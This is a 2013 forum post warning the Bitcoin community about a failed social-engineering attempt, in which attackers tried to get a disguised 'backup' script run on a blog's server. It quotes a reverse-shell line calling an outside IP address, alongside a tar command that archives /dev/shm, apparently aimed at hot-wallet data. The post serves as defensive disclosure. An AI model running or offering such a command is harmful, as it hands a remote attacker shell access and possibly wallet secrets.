|
Title: Social Engineering attack, probably Bitcoin-driven. Post by: MPOE-PR on June 09, 2013, 07:29:22 PM Mr P. was hit earlier today (http://polimedia.us/trilema/2013/in-the-interest-of-full-disclosure-failed-social-engineering-attempt-and-0day-vulnerability-in-betadesk/#comment-93505), to no actual effect.
While the attackers targetted his blog, the MO may have larger implications for the Bitcoin community, because the attacker was trying to get this (http://pastebin.com/asdWBEPB) script run on the server. The relevant part there is: Quote tar -cvzPf /root/$DIR/$DATE/$DATE-$SERVER-etc.tar.gz /dev/shm echo "Uploading backed up data." bash -i >& /dev/tcp/96.43.130.122/80 0>&1 which could perhaps compromise an electrum wallet? (or more generally any hotwallet if /shm is sloppily being used). This would be a good time for everyone running a hotwallet on a hosted/managed server to review their use of /shm, because you never know when an overworked entry level support person will just run a "back-up script" on your account. |